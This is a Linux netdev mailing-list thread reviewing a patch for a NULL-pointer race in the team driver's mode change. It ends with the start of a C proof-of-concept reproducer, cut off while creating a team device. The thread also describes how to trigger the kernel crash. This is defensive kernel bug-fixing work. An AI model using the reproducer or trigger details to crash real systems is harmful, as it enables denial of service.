Netdev List
 help / color / mirror / Atom feed
* [PATCH net v2] net: team: fix NULL pointer dereference in team_xmit during mode change
@ 2026-05-09 18:18 Weiming Shi
  2026-05-10 15:25 ` Jakub Kicinski
  0 siblings, 1 reply; 8+ messages in thread
From: Weiming Shi @ 2026-05-09 18:18 UTC (permalink / raw)
  To: Jiri Pirko, Andrew Lunn, David S . Miller, Eric Dumazet,
	Jakub Kicinski, Paolo Abeni
  Cc: netdev, Xiang Mei, Weiming Shi

__team_change_mode() clears team->ops with memset() before restoring
safe dummy handlers via team_adjust_ops(). A concurrent team_xmit()
running under RCU on another CPU can read team->ops.transmit during
this window and call a NULL function pointer, crashing the kernel.

The race requires CAP_NET_ADMIN (in init_user_ns) to trigger via
TEAM_CMD_OPTIONS_SET, plus AF_PACKET sendto() on a team device with
forced carrier and no ports.

 BUG: kernel NULL pointer dereference, address: 0000000000000000
 Oops: 0010 [#1] SMP KASAN NOPTI
 RIP: 0010:0x0
 Call Trace:
  team_xmit (drivers/net/team/team_core.c:1853)
  dev_hard_start_xmit (net/core/dev.c:3904)
  __dev_queue_xmit (net/core/dev.c:4871)
  packet_sendmsg (net/packet/af_packet.c:3109)
  __sys_sendto (net/socket.c:2265)

Fix this on the writer side by replacing the memset()/memcpy() with
per-field updates that keep transmit and receive always valid via
smp_store_release(), paired with smp_load_acquire() on the reader
side. A synchronize_net() before exit_op() drains in-flight readers
before tearing down mode state.

Fixes: 3d249d4ca7d0 ("net: introduce ethernet teaming device")
Reported-by: Xiang Mei <xmei5@asu.edu>
Signed-off-by: Weiming Shi <bestswngs@gmail.com>
---
v2:
 - Move fix from data path (reader-side NULL fallback) to
   configuration path (writer-side per-field updates), as suggested
   by the reviewer.
 - Use smp_store_release()/smp_load_acquire() instead of plain
   stores/loads for proper ordering on weakly-ordered architectures.
 - Add synchronize_net() before exit_op() to drain in-flight readers
   and prevent use-after-free of mode private state.

 drivers/net/team/team_core.c | 46 ++++++++++++++++++++++++++----------
 1 file changed, 33 insertions(+), 13 deletions(-)

diff --git a/drivers/net/team/team_core.c b/drivers/net/team/team_core.c
index 0c87f9972..dabee3aa7 100644
--- a/drivers/net/team/team_core.c
+++ b/drivers/net/team/team_core.c
@@ -534,21 +534,22 @@ static void team_adjust_ops(struct team *team)
 
 	if (!team->tx_en_port_count || !team_is_mode_set(team) ||
 	    !team->mode->ops->transmit)
-		team->ops.transmit = team_dummy_transmit;
+		smp_store_release(&team->ops.transmit, team_dummy_transmit);
 	else
-		team->ops.transmit = team->mode->ops->transmit;
+		smp_store_release(&team->ops.transmit, team->mode->ops->transmit);
 
 	if (!team->rx_en_port_count || !team_is_mode_set(team) ||
 	    !team->mode->ops->receive)
-		team->ops.receive = team_dummy_receive;
+		smp_store_release(&team->ops.receive, team_dummy_receive);
 	else
-		team->ops.receive = team->mode->ops->receive;
+		smp_store_release(&team->ops.receive, team->mode->ops->receive);
 }
 
 /*
- * We can benefit from the fact that it's ensured no port is present
- * at the time of mode change. Therefore no packets are in fly so there's no
- * need to set mode operations in any special way.
+ * team_change_mode() ensures no ports are present during mode change,
+ * but lockless readers (AF_PACKET) can still reach team_xmit(). Use
+ * smp_store_release() to publish safe dummy handlers before teardown,
+ * and synchronize_net() to drain in-flight readers.
  */
 static int __team_change_mode(struct team *team,
 			      const struct team_mode *new_mode)
@@ -557,9 +558,23 @@ static int __team_change_mode(struct team *team,
 	if (team_is_mode_set(team)) {
 		void (*exit_op)(struct team *team) = team->ops.exit;
 
-		/* Clear ops area so no callback is called any longer */
-		memset(&team->ops, 0, sizeof(struct team_mode_ops));
-		team_adjust_ops(team);
+		/* Install dummy handlers for locklessly-read hot-path ops
+		 * first, then clear cold-path ops that are only used under
+		 * RTNL.
+		 */
+		smp_store_release(&team->ops.transmit, team_dummy_transmit);
+		smp_store_release(&team->ops.receive, team_dummy_receive);
+		team->ops.init = NULL;
+		team->ops.exit = NULL;
+		team->ops.port_enter = NULL;
+		team->ops.port_leave = NULL;
+		team->ops.port_change_dev_addr = NULL;
+		team->ops.port_tx_disabled = NULL;
+
+		/* Ensure in-flight readers using old handlers have finished
+		 * before tearing down mode state they may depend on.
+		 */
+		synchronize_net();
 
 		if (exit_op)
 			exit_op(team);
@@ -582,7 +597,12 @@ static int __team_change_mode(struct team *team,
 	}
 
 	team->mode = new_mode;
-	memcpy(&team->ops, new_mode->ops, sizeof(struct team_mode_ops));
+	team->ops.init = new_mode->ops->init;
+	team->ops.exit = new_mode->ops->exit;
+	team->ops.port_enter = new_mode->ops->port_enter;
+	team->ops.port_leave = new_mode->ops->port_leave;
+	team->ops.port_change_dev_addr = new_mode->ops->port_change_dev_addr;
+	team->ops.port_tx_disabled = new_mode->ops->port_tx_disabled;
 	team_adjust_ops(team);
 
 	return 0;
@@ -743,7 +763,7 @@ static rx_handler_result_t team_handle_frame(struct sk_buff **pskb)
 		/* allow exact match delivery for disabled ports */
 		res = RX_HANDLER_EXACT;
 	} else {
-		res = team->ops.receive(team, port, skb);
+		res = smp_load_acquire(&team->ops.receive)(team, port, skb);
 	}
 	if (res == RX_HANDLER_ANOTHER) {
 		struct team_pcpu_stats *pcpu_stats;
@@ -1845,7 +1865,7 @@ static netdev_tx_t team_xmit(struct sk_buff *skb, struct net_device *dev)
 
 	tx_success = team_queue_override_transmit(team, skb);
 	if (!tx_success)
-		tx_success = team->ops.transmit(team, skb);
+		tx_success = smp_load_acquire(&team->ops.transmit)(team, skb);
 	if (tx_success) {
 		struct team_pcpu_stats *pcpu_stats;
 
-- 
2.43.0


^ permalink raw reply related	[flat|nested] 8+ messages in thread

* Re: [PATCH net v2] net: team: fix NULL pointer dereference in team_xmit during mode change
  2026-05-09 18:18 [PATCH net v2] net: team: fix NULL pointer dereference in team_xmit during mode change Weiming Shi
@ 2026-05-10 15:25 ` Jakub Kicinski
  2026-05-10 16:06   ` Weiming Shi
  0 siblings, 1 reply; 8+ messages in thread
From: Jakub Kicinski @ 2026-05-10 15:25 UTC (permalink / raw)
  To: Weiming Shi
  Cc: Jiri Pirko, Andrew Lunn, David S . Miller, Eric Dumazet,
	Paolo Abeni, netdev, Xiang Mei

On Sat,  9 May 2026 11:18:26 -0700 Weiming Shi wrote:
> __team_change_mode() clears team->ops with memset() before restoring
> safe dummy handlers via team_adjust_ops(). A concurrent team_xmit()
> running under RCU on another CPU can read team->ops.transmit during
> this window and call a NULL function pointer, crashing the kernel.
> 
> The race requires CAP_NET_ADMIN (in init_user_ns) to trigger via
> TEAM_CMD_OPTIONS_SET, plus AF_PACKET sendto() on a team device with
> forced carrier and no ports.
> 
>  BUG: kernel NULL pointer dereference, address: 0000000000000000
>  Oops: 0010 [#1] SMP KASAN NOPTI
>  RIP: 0010:0x0
>  Call Trace:
>   team_xmit (drivers/net/team/team_core.c:1853)
>   dev_hard_start_xmit (net/core/dev.c:3904)
>   __dev_queue_xmit (net/core/dev.c:4871)
>   packet_sendmsg (net/packet/af_packet.c:3109)
>   __sys_sendto (net/socket.c:2265)
> 
> Fix this on the writer side by replacing the memset()/memcpy() with
> per-field updates that keep transmit and receive always valid via
> smp_store_release(), paired with smp_load_acquire() on the reader
> side. A synchronize_net() before exit_op() drains in-flight readers
> before tearing down mode state.

Barriers are between things. What are the release / acquire barriers
synchronizing.

> Fixes: 3d249d4ca7d0 ("net: introduce ethernet teaming device")
> Reported-by: Xiang Mei <xmei5@asu.edu>
> Signed-off-by: Weiming Shi <bestswngs@gmail.com>
> ---
> v2:
>  - Move fix from data path (reader-side NULL fallback) to
>    configuration path (writer-side per-field updates), as suggested
>    by the reviewer.
>  - Use smp_store_release()/smp_load_acquire() instead of plain
>    stores/loads for proper ordering on weakly-ordered architectures.
>  - Add synchronize_net() before exit_op() to drain in-flight readers
>    and prevent use-after-free of mode private state.
> 
>  drivers/net/team/team_core.c | 46 ++++++++++++++++++++++++++----------
>  1 file changed, 33 insertions(+), 13 deletions(-)
> 
> diff --git a/drivers/net/team/team_core.c b/drivers/net/team/team_core.c
> index 0c87f9972..dabee3aa7 100644
> --- a/drivers/net/team/team_core.c
> +++ b/drivers/net/team/team_core.c
> @@ -534,21 +534,22 @@ static void team_adjust_ops(struct team *team)
>  
>  	if (!team->tx_en_port_count || !team_is_mode_set(team) ||
>  	    !team->mode->ops->transmit)
> -		team->ops.transmit = team_dummy_transmit;
> +		smp_store_release(&team->ops.transmit, team_dummy_transmit);
>  	else
> -		team->ops.transmit = team->mode->ops->transmit;
> +		smp_store_release(&team->ops.transmit, team->mode->ops->transmit);
>  
>  	if (!team->rx_en_port_count || !team_is_mode_set(team) ||
>  	    !team->mode->ops->receive)
> -		team->ops.receive = team_dummy_receive;
> +		smp_store_release(&team->ops.receive, team_dummy_receive);
>  	else
> -		team->ops.receive = team->mode->ops->receive;
> +		smp_store_release(&team->ops.receive, team->mode->ops->receive);
>  }
>  
>  /*
> - * We can benefit from the fact that it's ensured no port is present
> - * at the time of mode change. Therefore no packets are in fly so there's no
> - * need to set mode operations in any special way.
> + * team_change_mode() ensures no ports are present during mode change,
> + * but lockless readers (AF_PACKET) can still reach team_xmit(). Use

Why is AF_PACKET relevant here??

> + * smp_store_release() to publish safe dummy handlers before teardown,
> + * and synchronize_net() to drain in-flight readers.
>   */
>  static int __team_change_mode(struct team *team,
>  			      const struct team_mode *new_mode)
> @@ -557,9 +558,23 @@ static int __team_change_mode(struct team *team,
>  	if (team_is_mode_set(team)) {
>  		void (*exit_op)(struct team *team) = team->ops.exit;
>  
> -		/* Clear ops area so no callback is called any longer */
> -		memset(&team->ops, 0, sizeof(struct team_mode_ops));
> -		team_adjust_ops(team);
> +		/* Install dummy handlers for locklessly-read hot-path ops
> +		 * first, then clear cold-path ops that are only used under
> +		 * RTNL.
> +		 */
> +		smp_store_release(&team->ops.transmit, team_dummy_transmit);
> +		smp_store_release(&team->ops.receive, team_dummy_receive);
> +		team->ops.init = NULL;
> +		team->ops.exit = NULL;
> +		team->ops.port_enter = NULL;
> +		team->ops.port_leave = NULL;
> +		team->ops.port_change_dev_addr = NULL;
> +		team->ops.port_tx_disabled = NULL;
> +
> +		/* Ensure in-flight readers using old handlers have finished
> +		 * before tearing down mode state they may depend on.
> +		 */
> +		synchronize_net();
>  
>  		if (exit_op)
>  			exit_op(team);
> @@ -582,7 +597,12 @@ static int __team_change_mode(struct team *team,
>  	}
>  
>  	team->mode = new_mode;
> -	memcpy(&team->ops, new_mode->ops, sizeof(struct team_mode_ops));
> +	team->ops.init = new_mode->ops->init;
> +	team->ops.exit = new_mode->ops->exit;
> +	team->ops.port_enter = new_mode->ops->port_enter;
> +	team->ops.port_leave = new_mode->ops->port_leave;
> +	team->ops.port_change_dev_addr = new_mode->ops->port_change_dev_addr;
> +	team->ops.port_tx_disabled = new_mode->ops->port_tx_disabled;
>  	team_adjust_ops(team);
>  
>  	return 0;
> @@ -743,7 +763,7 @@ static rx_handler_result_t team_handle_frame(struct sk_buff **pskb)
>  		/* allow exact match delivery for disabled ports */
>  		res = RX_HANDLER_EXACT;
>  	} else {
> -		res = team->ops.receive(team, port, skb);
> +		res = smp_load_acquire(&team->ops.receive)(team, port, skb);
>  	}
>  	if (res == RX_HANDLER_ANOTHER) {
>  		struct team_pcpu_stats *pcpu_stats;
> @@ -1845,7 +1865,7 @@ static netdev_tx_t team_xmit(struct sk_buff *skb, struct net_device *dev)
>  
>  	tx_success = team_queue_override_transmit(team, skb);
>  	if (!tx_success)
> -		tx_success = team->ops.transmit(team, skb);
> +		tx_success = smp_load_acquire(&team->ops.transmit)(team, skb);
>  	if (tx_success) {
>  		struct team_pcpu_stats *pcpu_stats;
>  
-- 
pw-bot: cr

^ permalink raw reply	[flat|nested] 8+ messages in thread

* Re: [PATCH net v2] net: team: fix NULL pointer dereference in team_xmit during mode change
  2026-05-10 15:25 ` Jakub Kicinski
@ 2026-05-10 16:06   ` Weiming Shi
  2026-05-10 16:59     ` Jakub Kicinski
  0 siblings, 1 reply; 8+ messages in thread
From: Weiming Shi @ 2026-05-10 16:06 UTC (permalink / raw)
  To: Jakub Kicinski
  Cc: Jiri Pirko, Andrew Lunn, David S . Miller, Eric Dumazet,
	Paolo Abeni, netdev, Xiang Mei

On 26-05-10 08:25, Jakub Kicinski wrote:
> On Sat,  9 May 2026 11:18:26 -0700 Weiming Shi wrote:
> > __team_change_mode() clears team->ops with memset() before restoring
> > safe dummy handlers via team_adjust_ops(). A concurrent team_xmit()
> > running under RCU on another CPU can read team->ops.transmit during
> > this window and call a NULL function pointer, crashing the kernel.
> > 
> > The race requires CAP_NET_ADMIN (in init_user_ns) to trigger via
> > TEAM_CMD_OPTIONS_SET, plus AF_PACKET sendto() on a team device with
> > forced carrier and no ports.
> > 
> >  BUG: kernel NULL pointer dereference, address: 0000000000000000
> >  Oops: 0010 [#1] SMP KASAN NOPTI
> >  RIP: 0010:0x0
> >  Call Trace:
> >   team_xmit (drivers/net/team/team_core.c:1853)
> >   dev_hard_start_xmit (net/core/dev.c:3904)
> >   __dev_queue_xmit (net/core/dev.c:4871)
> >   packet_sendmsg (net/packet/af_packet.c:3109)
> >   __sys_sendto (net/socket.c:2265)
> > 
> > Fix this on the writer side by replacing the memset()/memcpy() with
> > per-field updates that keep transmit and receive always valid via
> > smp_store_release(), paired with smp_load_acquire() on the reader
> > side. A synchronize_net() before exit_op() drains in-flight readers
> > before tearing down mode state.
> 
> Barriers are between things. What are the release / acquire barriers
> synchronizing.

The handler function pointer against the mode_priv state it operates
on.  On setup, init() writes mode_priv, then smp_store_release()
publishes the real handler - the paired smp_load_acquire() in the
reader ensures the handler sees that state.  On teardown,
smp_store_release() publishes the dummy before synchronize_net()
drains readers, so exit_op() won't tear down state under an
in-flight reader.

> 
> > Fixes: 3d249d4ca7d0 ("net: introduce ethernet teaming device")
> > Reported-by: Xiang Mei <xmei5@asu.edu>
> > Signed-off-by: Weiming Shi <bestswngs@gmail.com>
> > ---
> > v2:
> >  - Move fix from data path (reader-side NULL fallback) to
> >    configuration path (writer-side per-field updates), as suggested
> >    by the reviewer.
> >  - Use smp_store_release()/smp_load_acquire() instead of plain
> >    stores/loads for proper ordering on weakly-ordered architectures.
> >  - Add synchronize_net() before exit_op() to drain in-flight readers
> >    and prevent use-after-free of mode private state.
> > 
> >  drivers/net/team/team_core.c | 46 ++++++++++++++++++++++++++----------
> >  1 file changed, 33 insertions(+), 13 deletions(-)
> > 
> > diff --git a/drivers/net/team/team_core.c b/drivers/net/team/team_core.c
> > index 0c87f9972..dabee3aa7 100644
> > --- a/drivers/net/team/team_core.c
> > +++ b/drivers/net/team/team_core.c
> > @@ -534,21 +534,22 @@ static void team_adjust_ops(struct team *team)
> >  
> >  	if (!team->tx_en_port_count || !team_is_mode_set(team) ||
> >  	    !team->mode->ops->transmit)
> > -		team->ops.transmit = team_dummy_transmit;
> > +		smp_store_release(&team->ops.transmit, team_dummy_transmit);
> >  	else
> > -		team->ops.transmit = team->mode->ops->transmit;
> > +		smp_store_release(&team->ops.transmit, team->mode->ops->transmit);
> >  
> >  	if (!team->rx_en_port_count || !team_is_mode_set(team) ||
> >  	    !team->mode->ops->receive)
> > -		team->ops.receive = team_dummy_receive;
> > +		smp_store_release(&team->ops.receive, team_dummy_receive);
> >  	else
> > -		team->ops.receive = team->mode->ops->receive;
> > +		smp_store_release(&team->ops.receive, team->mode->ops->receive);
> >  }
> >  
> >  /*
> > - * We can benefit from the fact that it's ensured no port is present
> > - * at the time of mode change. Therefore no packets are in fly so there's no
> > - * need to set mode operations in any special way.
> > + * team_change_mode() ensures no ports are present during mode change,
> > + * but lockless readers (AF_PACKET) can still reach team_xmit(). Use
> 
> Why is AF_PACKET relevant here??
> 

Not specific to the bug, just a reproducer detail.  Dropped.

Sending v3 with the updated changelog shortly.

> > + * smp_store_release() to publish safe dummy handlers before teardown,
> > + * and synchronize_net() to drain in-flight readers.
> >   */
> >  static int __team_change_mode(struct team *team,
> >  			      const struct team_mode *new_mode)
> > @@ -557,9 +558,23 @@ static int __team_change_mode(struct team *team,
> >  	if (team_is_mode_set(team)) {
> >  		void (*exit_op)(struct team *team) = team->ops.exit;
> >  
> > -		/* Clear ops area so no callback is called any longer */
> > -		memset(&team->ops, 0, sizeof(struct team_mode_ops));
> > -		team_adjust_ops(team);
> > +		/* Install dummy handlers for locklessly-read hot-path ops
> > +		 * first, then clear cold-path ops that are only used under
> > +		 * RTNL.
> > +		 */
> > +		smp_store_release(&team->ops.transmit, team_dummy_transmit);
> > +		smp_store_release(&team->ops.receive, team_dummy_receive);
> > +		team->ops.init = NULL;
> > +		team->ops.exit = NULL;
> > +		team->ops.port_enter = NULL;
> > +		team->ops.port_leave = NULL;
> > +		team->ops.port_change_dev_addr = NULL;
> > +		team->ops.port_tx_disabled = NULL;
> > +
> > +		/* Ensure in-flight readers using old handlers have finished
> > +		 * before tearing down mode state they may depend on.
> > +		 */
> > +		synchronize_net();
> >  
> >  		if (exit_op)
> >  			exit_op(team);
> > @@ -582,7 +597,12 @@ static int __team_change_mode(struct team *team,
> >  	}
> >  
> >  	team->mode = new_mode;
> > -	memcpy(&team->ops, new_mode->ops, sizeof(struct team_mode_ops));
> > +	team->ops.init = new_mode->ops->init;
> > +	team->ops.exit = new_mode->ops->exit;
> > +	team->ops.port_enter = new_mode->ops->port_enter;
> > +	team->ops.port_leave = new_mode->ops->port_leave;
> > +	team->ops.port_change_dev_addr = new_mode->ops->port_change_dev_addr;
> > +	team->ops.port_tx_disabled = new_mode->ops->port_tx_disabled;
> >  	team_adjust_ops(team);
> >  
> >  	return 0;
> > @@ -743,7 +763,7 @@ static rx_handler_result_t team_handle_frame(struct sk_buff **pskb)
> >  		/* allow exact match delivery for disabled ports */
> >  		res = RX_HANDLER_EXACT;
> >  	} else {
> > -		res = team->ops.receive(team, port, skb);
> > +		res = smp_load_acquire(&team->ops.receive)(team, port, skb);
> >  	}
> >  	if (res == RX_HANDLER_ANOTHER) {
> >  		struct team_pcpu_stats *pcpu_stats;
> > @@ -1845,7 +1865,7 @@ static netdev_tx_t team_xmit(struct sk_buff *skb, struct net_device *dev)
> >  
> >  	tx_success = team_queue_override_transmit(team, skb);
> >  	if (!tx_success)
> > -		tx_success = team->ops.transmit(team, skb);
> > +		tx_success = smp_load_acquire(&team->ops.transmit)(team, skb);
> >  	if (tx_success) {
> >  		struct team_pcpu_stats *pcpu_stats;
> >  
> -- 
> pw-bot: cr

^ permalink raw reply	[flat|nested] 8+ messages in thread

* Re: [PATCH net v2] net: team: fix NULL pointer dereference in team_xmit during mode change
  2026-05-10 16:06   ` Weiming Shi
@ 2026-05-10 16:59     ` Jakub Kicinski
  2026-05-18  9:51       ` Weiming Shi
  0 siblings, 1 reply; 8+ messages in thread
From: Jakub Kicinski @ 2026-05-10 16:59 UTC (permalink / raw)
  To: Weiming Shi
  Cc: Jiri Pirko, Andrew Lunn, David S . Miller, Eric Dumazet,
	Paolo Abeni, netdev, Xiang Mei

On Mon, 11 May 2026 00:06:50 +0800 Weiming Shi wrote:
> > Barriers are between things. What are the release / acquire barriers
> > synchronizing.  
> 
> The handler function pointer against the mode_priv state it operates
> on.  On setup, init() writes mode_priv, then smp_store_release()
> publishes the real handler - the paired smp_load_acquire() in the
> reader ensures the handler sees that state.  On teardown,
> smp_store_release() publishes the dummy before synchronize_net()
> drains readers, so exit_op() won't tear down state under an
> in-flight reader.

Still does not make sense to me. You already add sync_net().
And if it's possible to switch from dummy to non-dummy mode
the ordering is inverted.

> > Why is AF_PACKET relevant here??
> >   
> 
> Not specific to the bug, just a reproducer detail.  Dropped.
> 
> Sending v3 with the updated changelog shortly.

Please don't rush new versions out.

^ permalink raw reply	[flat|nested] 8+ messages in thread

* Re: [PATCH net v2] net: team: fix NULL pointer dereference in team_xmit during mode change
  2026-05-10 16:59     ` Jakub Kicinski
@ 2026-05-18  9:51       ` Weiming Shi
  2026-05-18 21:22         ` Jakub Kicinski
  0 siblings, 1 reply; 8+ messages in thread
From: Weiming Shi @ 2026-05-18  9:51 UTC (permalink / raw)
  To: Jakub Kicinski
  Cc: Jiri Pirko, Andrew Lunn, David S . Miller, Eric Dumazet,
	Paolo Abeni, netdev, Xiang Mei

On 26-05-10 09:59, Jakub Kicinski wrote:
> On Mon, 11 May 2026 00:06:50 +0800 Weiming Shi wrote:
> > > Barriers are between things. What are the release / acquire barriers
> > > synchronizing.  
> > 
> > The handler function pointer against the mode_priv state it operates
> > on.  On setup, init() writes mode_priv, then smp_store_release()
> > publishes the real handler - the paired smp_load_acquire() in the
> > reader ensures the handler sees that state.  On teardown,
> > smp_store_release() publishes the dummy before synchronize_net()
> > drains readers, so exit_op() won't tear down state under an
> > in-flight reader.
> 
> Still does not make sense to me. You already add sync_net().
> And if it's possible to switch from dummy to non-dummy mode
> the ordering is inverted.
> 
> > > Why is AF_PACKET relevant here??
> > >   
> > 
> > Not specific to the bug, just a reproducer detail.  Dropped.
> > 
> > Sending v3 with the updated changelog shortly.
> 
> Please don't rush new versions out.

Hi Jakub,

Apologies for the late reply and for rushing v3.

I was muddling two things. On teardown synchronize_net() is the protection,
the release/acquire is for the setup path where init() writes
mode_priv before team_adjust_ops() publishes the handler.

If that makes sense I'll send v4 with the corrected commit message.

Thanks,
Weiming Shi





^ permalink raw reply	[flat|nested] 8+ messages in thread

* Re: [PATCH net v2] net: team: fix NULL pointer dereference in team_xmit during mode change
  2026-05-18  9:51       ` Weiming Shi
@ 2026-05-18 21:22         ` Jakub Kicinski
  2026-05-19  8:51           ` Weiming Shi
  2026-05-19  8:57           ` Weiming Shi
  0 siblings, 2 replies; 8+ messages in thread
From: Jakub Kicinski @ 2026-05-18 21:22 UTC (permalink / raw)
  To: Weiming Shi
  Cc: Jiri Pirko, Andrew Lunn, David S . Miller, Eric Dumazet,
	Paolo Abeni, netdev, Xiang Mei

On Mon, 18 May 2026 17:51:54 +0800 Weiming Shi wrote:
> On 26-05-10 09:59, Jakub Kicinski wrote:
> > On Mon, 11 May 2026 00:06:50 +0800 Weiming Shi wrote:  
> > > The handler function pointer against the mode_priv state it operates
> > > on.  On setup, init() writes mode_priv, then smp_store_release()
> > > publishes the real handler - the paired smp_load_acquire() in the
> > > reader ensures the handler sees that state.  On teardown,
> > > smp_store_release() publishes the dummy before synchronize_net()
> > > drains readers, so exit_op() won't tear down state under an
> > > in-flight reader.  
> > 
> > Still does not make sense to me. You already add sync_net().
> > And if it's possible to switch from dummy to non-dummy mode
> > the ordering is inverted.
> >   
> > > Not specific to the bug, just a reproducer detail.  Dropped.
> > > 
> > > Sending v3 with the updated changelog shortly.  
> > 
> > Please don't rush new versions out.  
> 
> Hi Jakub,
> 
> Apologies for the late reply and for rushing v3.
> 
> I was muddling two things. On teardown synchronize_net() is the protection,
> the release/acquire is for the setup path where init() writes
> mode_priv before team_adjust_ops() publishes the handler.
> 
> If that makes sense I'll send v4 with the corrected commit message.

Can you provide more details for the init() path race?
What's the sequence of events?

^ permalink raw reply	[flat|nested] 8+ messages in thread

* Re: [PATCH net v2] net: team: fix NULL pointer dereference in team_xmit during mode change
  2026-05-18 21:22         ` Jakub Kicinski
@ 2026-05-19  8:51           ` Weiming Shi
  2026-05-19  8:57           ` Weiming Shi
  1 sibling, 0 replies; 8+ messages in thread
From: Weiming Shi @ 2026-05-19  8:51 UTC (permalink / raw)
  To: Jakub Kicinski
  Cc: Jiri Pirko, Andrew Lunn, David S . Miller, Eric Dumazet,
	Paolo Abeni, netdev, Xiang Mei

On 26-05-18 14:22, Jakub Kicinski wrote:
> On Mon, 18 May 2026 17:51:54 +0800 Weiming Shi wrote:
> > On 26-05-10 09:59, Jakub Kicinski wrote:
> > > On Mon, 11 May 2026 00:06:50 +0800 Weiming Shi wrote:  
> > > > The handler function pointer against the mode_priv state it operates
> > > > on.  On setup, init() writes mode_priv, then smp_store_release()
> > > > publishes the real handler - the paired smp_load_acquire() in the
> > > > reader ensures the handler sees that state.  On teardown,
> > > > smp_store_release() publishes the dummy before synchronize_net()
> > > > drains readers, so exit_op() won't tear down state under an
> > > > in-flight reader.  
> > > 
> > > Still does not make sense to me. You already add sync_net().
> > > And if it's possible to switch from dummy to non-dummy mode
> > > the ordering is inverted.
> > >   
> > > > Not specific to the bug, just a reproducer detail.  Dropped.
> > > > 
> > > > Sending v3 with the updated changelog shortly.  
> > > 
> > > Please don't rush new versions out.  
> > 
> > Hi Jakub,
> > 
> > Apologies for the late reply and for rushing v3.
> > 
> > I was muddling two things. On teardown synchronize_net() is the protection,
> > the release/acquire is for the setup path where init() writes
> > mode_priv before team_adjust_ops() publishes the handler.
> > 
> > If that makes sense I'll send v4 with the corrected commit message.
> 
> Can you provide more details for the init() path race?
> What's the sequence of events?

With loadbalance mode:
 
  lb_init() stores select_tx_port_func (team_mode_loadbalance.c:595).
  When a port is later enabled, team_adjust_ops() publishes
  lb_transmit with a plain store (team_core.c:539).

Without the release/acquire, a concurrent team_xmit() on a weakly-ordered 
arch can see lb_transmit but not the select_tx_port_func store, and lb_transmit 
dereferences it at line 227.

I'll send a PoC in the next mail so you can reproduce it.

 

^ permalink raw reply	[flat|nested] 8+ messages in thread

* Re: [PATCH net v2] net: team: fix NULL pointer dereference in team_xmit during mode change
  2026-05-18 21:22         ` Jakub Kicinski
  2026-05-19  8:51           ` Weiming Shi
@ 2026-05-19  8:57           ` Weiming Shi
  1 sibling, 0 replies; 8+ messages in thread
From: Weiming Shi @ 2026-05-19  8:57 UTC (permalink / raw)
  To: Jakub Kicinski
  Cc: Jiri Pirko, Andrew Lunn, David S . Miller, Eric Dumazet,
	Paolo Abeni, netdev, Xiang Mei


Required key configs for the poc:

```
CONFIG_NET_TEAM=y
CONFIG_NET_TEAM_MODE_ROUNDROBIN=y
CONFIG_NET_TEAM_MODE_ACTIVEBACKUP=y
CONFIG_NET_TEAM_MODE_BROADCAST=y
CONFIG_PACKET=y
```

The PoC used for reproduction:
```c
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <sched.h>
#include <signal.h>
#include <stdio.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <pthread.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <sys/socket.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <sys/prctl.h>
#include <linux/netlink.h>
#include <linux/rtnetlink.h>
#include <linux/genetlink.h>
#include <linux/if.h>
#include <linux/if_packet.h>
#include <linux/if_ether.h>
#include <linux/if_arp.h>
#include <arpa/inet.h>

/* team genl uapi constants (from include/uapi/linux/if_team.h) */
#define TEAM_GENL_NAME          "team"
#define TEAM_GENL_VERSION       1
#define TEAM_ATTR_TEAM_IFINDEX  1
#define TEAM_ATTR_LIST_OPTION   2
#define TEAM_ATTR_ITEM_OPTION   1
#define TEAM_ATTR_OPTION_NAME   1
#define TEAM_ATTR_OPTION_TYPE   3
#define TEAM_ATTR_OPTION_DATA   4
#define TEAM_CMD_OPTIONS_SET    1

#ifndef NLA_F_NESTED
#define NLA_F_NESTED 0x8000
#endif

/* enum nla_attr_type from <net/netlink.h>: NLA_UNSPEC=0, NLA_U8=1,
 * NLA_U16=2, NLA_U32=3, NLA_U64=4, NLA_STRING=5. */
#define POC_NLA_STRING 5

static int g_team_ifindex = -1;
static int g_team_family = -1;
static volatile int g_stop = 0;
static volatile unsigned long g_flips = 0;
static volatile unsigned long g_xmits = 0;

static void die(const char *msg)
{
        perror(msg);
        exit(1);
}

/* ---- rtnetlink helpers ---- */

struct nlmsg {
        struct nlmsghdr nh;
        char buf[4096];
};

static void nlmsg_add_attr(struct nlmsghdr *nh, int type, const void *data, int dlen)
{
        struct rtattr *a = (struct rtattr *)((char *)nh + NLMSG_ALIGN(nh->nlmsg_len));
        a->rta_type = type;
        a->rta_len = RTA_LENGTH(dlen);
        memcpy(RTA_DATA(a), data, dlen);
        nh->nlmsg_len = NLMSG_ALIGN(nh->nlmsg_len) + RTA_ALIGN(a->rta_len);
}

static struct rtattr *nlmsg_add_nested(struct nlmsghdr *nh, int type)
{
        struct rtattr *a = (struct rtattr *)((char *)nh + NLMSG_ALIGN(nh->nlmsg_len));
        a->rta_type = type;
        a->rta_len = RTA_LENGTH(0);
        nh->nlmsg_len = NLMSG_ALIGN(nh->nlmsg_len) + RTA_ALIGN(a->rta_len);
        return a;
}

static void nlmsg_end_nested(struct nlmsghdr *nh, struct rtattr *nest)
{
        nest->rta_len = (char *)nh + nh->nlmsg_len - (char *)nest;
}

static int create_team_device(const char *name)
{
        int sk = socket(AF_NETLINK, SOCK_RAW, NETLINK_ROUTE);
        if (sk < 0) die("socket rtnetlink");

        struct sockaddr_nl sa = { .nl_family = AF_NETLINK };
        if (bind(sk, (struct sockaddr *)&sa, sizeof(sa)) < 0)
                die("bind nl");

        struct nlmsg m = {0};
        m.nh.nlmsg_len = NLMSG_LENGTH(sizeof(struct ifinfomsg));
        m.nh.nlmsg_type = RTM_NEWLINK;
        m.nh.nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK | NLM_F_CREATE | NLM_F_EXCL;
        m.nh.nlmsg_seq = 1;

        struct ifinfomsg *ifi = (struct ifinfomsg *)NLMSG_DATA(&m.nh);
        ifi->ifi_family = AF_UNSPEC;
        ifi->ifi_change = 0xffffffff;

        nlmsg_add_attr(&m.nh, IFLA_IFNAME, name, strlen(name) + 1);
        struct rtattr *linkinfo = nlmsg_add_nested(&m.nh, IFLA_LINKINFO);
        nlmsg_add_attr(&m.nh, IFLA_INFO_KIND, "team", 5);
        nlmsg_end_nested(&m.nh, linkinfo);

        if (send(sk, &m, m.nh.nlmsg_len, 0) < 0) die("send RTM_NEWLINK");

        char rbuf[4096];
